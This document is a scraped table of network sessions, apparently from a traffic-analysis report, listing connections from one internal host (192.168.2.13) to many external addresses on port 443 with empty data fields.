                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15955192.168.2.135915879.179.254.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15956192.168.2.1352700188.60.249.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15957192.168.2.134010665.225.97.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15958192.168.2.134196414.248.217.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15959192.168.2.1357790151.215.223.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15960192.168.2.1354652169.36.140.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15961192.168.2.1358464195.133.229.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15962192.168.2.1360182117.130.43.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15963192.168.2.1358082146.101.216.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15964192.168.2.134725249.111.180.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15965192.168.2.133532487.237.214.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15966192.168.2.1336650101.80.92.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15967192.168.2.1335030118.231.21.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15968192.168.2.134049271.134.218.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15969192.168.2.1356526161.231.154.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15970192.168.2.1343744195.194.15.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15971192.168.2.1355686103.181.196.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15972192.168.2.1346570181.222.181.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15973192.168.2.133484649.190.93.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15974192.168.2.1337342154.166.10.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15975192.168.2.1353062117.119.217.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15976192.168.2.136032054.177.100.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15977192.168.2.133362213.122.44.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15978192.168.2.133427281.149.170.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15979192.168.2.1334822111.243.142.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15980192.168.2.1333112223.217.73.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15981192.168.2.1340156203.232.106.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15982192.168.2.1335206129.251.34.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15983192.168.2.1347560103.80.184.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15984192.168.2.1353436118.51.253.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15985192.168.2.1359974220.120.65.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15986192.168.2.133758469.64.202.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15987192.168.2.135647639.163.188.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15988192.168.2.1341130195.90.185.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15989192.168.2.1358346191.224.2.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15990192.168.2.135534462.113.234.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15991192.168.2.133301459.163.20.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15992192.168.2.1354420176.193.176.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15993192.168.2.1337704145.164.35.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15994192.168.2.1334410119.64.204.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15995192.168.2.1348854125.206.29.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15996192.168.2.134646675.77.6.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15997192.168.2.134188652.31.173.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15998192.168.2.1336022189.26.99.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15999192.168.2.1339846194.113.196.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16000192.168.2.1339770169.89.26.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16001192.168.2.1353208131.22.77.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16002192.168.2.1351598192.181.135.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16003192.168.2.1335160144.126.129.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16004192.168.2.1354786134.217.250.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16005192.168.2.133767493.17.10.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16006192.168.2.1357122191.76.82.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16007192.168.2.1334830126.20.203.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16008192.168.2.1359252149.155.81.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16009192.168.2.1355884138.185.137.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16010192.168.2.135392272.4.49.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16011192.168.2.134176639.83.172.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16012192.168.2.1355968107.15.24.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16013192.168.2.133959678.21.159.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16014192.168.2.1349870200.156.103.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16015192.168.2.1351676159.212.174.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16016192.168.2.133548077.243.143.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16017192.168.2.1345474210.167.125.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16018192.168.2.1354316181.64.24.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16019192.168.2.133953644.92.183.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16020192.168.2.135189443.124.77.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16021192.168.2.1360412107.226.240.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16022192.168.2.1335746143.248.19.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16023192.168.2.1337472192.77.22.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16024192.168.2.133676035.105.175.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16025192.168.2.1350406117.21.91.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16026192.168.2.1339802169.210.25.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16027192.168.2.13328389.49.9.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16028192.168.2.135482468.127.143.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16029192.168.2.1337322191.109.248.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16030192.168.2.135261462.206.187.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16031192.168.2.1350628209.15.239.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16032192.168.2.133939084.248.90.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16033192.168.2.135043862.68.149.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16034192.168.2.1335604175.59.218.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16035192.168.2.1338496106.178.124.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16036192.168.2.134467874.132.224.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16037192.168.2.134221081.170.10.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16038192.168.2.135084492.42.38.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16039192.168.2.135948245.161.86.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16040192.168.2.133501435.31.10.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16041192.168.2.1352350177.249.123.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16042192.168.2.1353100193.33.3.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16043192.168.2.1352412216.126.16.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16044192.168.2.135640846.188.160.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16045192.168.2.135958672.162.105.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16046192.168.2.1343624219.126.98.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16047192.168.2.1346628180.99.18.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16048192.168.2.1358998188.36.109.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16049192.168.2.1339198207.168.158.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16050192.168.2.133588278.83.49.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16051192.168.2.1344290188.82.115.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16052192.168.2.1344086117.110.6.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16053192.168.2.133845064.185.2.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16054192.168.2.1343084119.237.255.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16055192.168.2.134743270.88.142.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16056192.168.2.1342038152.118.216.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16057192.168.2.134120238.86.245.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16058192.168.2.1359548219.216.21.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16059192.168.2.1352574129.131.103.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16060192.168.2.134243057.6.150.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16061192.168.2.1338694132.60.25.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16062192.168.2.1355820148.117.233.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16063192.168.2.135860498.226.226.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16064192.168.2.1345704126.131.206.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16065192.168.2.134124637.98.230.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16066192.168.2.133431434.228.255.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16067192.168.2.1335430140.94.65.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16068192.168.2.1350446129.41.225.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16069192.168.2.1347690102.31.112.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16070192.168.2.1333206159.122.147.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16071192.168.2.134473812.52.196.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16072192.168.2.135519840.52.90.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16073192.168.2.1338288207.198.21.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16074192.168.2.134715478.244.209.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16075192.168.2.135869692.244.165.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16076192.168.2.134480820.2.106.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16077192.168.2.1353734113.208.201.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16078192.168.2.134525268.149.242.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16079192.168.2.134828466.118.68.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16080192.168.2.1354580123.115.239.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16081192.168.2.1352810184.15.192.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16082192.168.2.133899870.98.206.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16083192.168.2.135954031.44.4.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16084192.168.2.1333052178.199.98.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16085192.168.2.1334464172.150.77.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16086192.168.2.134257865.36.127.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16087192.168.2.1349144177.247.212.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16088192.168.2.134648664.192.7.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16089192.168.2.134314290.249.21.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16090192.168.2.134733047.117.38.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16091192.168.2.1358428149.144.104.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16092192.168.2.1359556199.227.119.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16093192.168.2.135634650.8.205.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16094192.168.2.1340318195.145.11.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16095192.168.2.135939623.210.127.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16096192.168.2.1354114210.117.188.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16097192.168.2.1351412138.246.185.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16098192.168.2.1333540188.179.55.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16099192.168.2.134163237.244.142.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16100192.168.2.1358568200.77.132.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16101192.168.2.1340868162.184.76.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16102192.168.2.134377017.239.100.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16103192.168.2.1354292175.26.122.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16104192.168.2.1352530131.125.204.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16105192.168.2.1334960172.232.121.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16106192.168.2.135665013.63.176.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16107192.168.2.133842219.22.182.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16108192.168.2.135247064.97.56.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16109192.168.2.135252089.183.115.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16110192.168.2.1358958188.127.48.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16111192.168.2.1345698198.86.144.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16112192.168.2.1358150136.212.134.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16113192.168.2.1347036163.241.21.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16114192.168.2.136018257.6.38.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16115192.168.2.133955696.22.38.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16116192.168.2.1338002206.115.125.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16117192.168.2.133307697.41.149.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16118192.168.2.1346568199.68.127.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16119192.168.2.1333474119.128.226.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16120192.168.2.1345822179.153.139.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16121192.168.2.1338292192.167.157.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16122192.168.2.134356263.102.255.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16123192.168.2.1335688113.145.231.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16124192.168.2.133551646.221.189.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16125192.168.2.134040687.220.214.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16126192.168.2.1338006159.231.84.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16127192.168.2.135574854.117.47.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16128192.168.2.1333930154.255.170.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16129192.168.2.1332796202.81.205.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16130192.168.2.135749449.48.116.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16131192.168.2.1356386164.170.130.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16132192.168.2.1356544187.69.188.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16133192.168.2.1358398196.100.18.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16134192.168.2.1341118121.223.35.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16135192.168.2.1333308169.173.65.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16136192.168.2.1348014223.243.254.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16137192.168.2.133396620.32.144.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16138192.168.2.134630044.244.185.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16139192.168.2.1341176128.209.115.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16140192.168.2.1351586216.219.137.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16141192.168.2.1347492105.57.150.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16142192.168.2.135611460.157.99.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16143192.168.2.1349970158.153.113.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16144192.168.2.1360680178.39.81.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16145192.168.2.133371820.207.107.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16146192.168.2.1347638192.164.15.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16147192.168.2.134186464.204.17.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16148192.168.2.1354542106.42.194.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16149192.168.2.1349730161.144.151.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16150192.168.2.1350592167.172.81.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16151192.168.2.1341062131.113.183.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16152192.168.2.1349486222.158.63.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16153192.168.2.1339804146.145.216.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16154192.168.2.1341408207.168.59.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16155192.168.2.1354566135.112.223.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16156192.168.2.1350810131.132.71.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16157192.168.2.1334476146.15.200.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16158192.168.2.1333530197.54.27.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16159192.168.2.1352884177.159.169.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16160192.168.2.1335852167.32.117.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16161192.168.2.133593654.232.71.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16162192.168.2.135399885.48.110.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16163192.168.2.1360250137.241.239.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16164192.168.2.1347406111.190.63.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16165192.168.2.1355368201.161.18.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16166192.168.2.133694051.13.80.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16167192.168.2.133471417.226.46.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16168192.168.2.1339838174.194.22.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16169192.168.2.135594260.250.11.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16170192.168.2.1343804164.108.11.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16171192.168.2.135993060.109.187.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16172192.168.2.1336284158.229.236.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16173192.168.2.1343446125.8.176.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16174192.168.2.1336220205.138.255.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16175192.168.2.134376480.57.204.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16176192.168.2.1359980208.237.57.130443
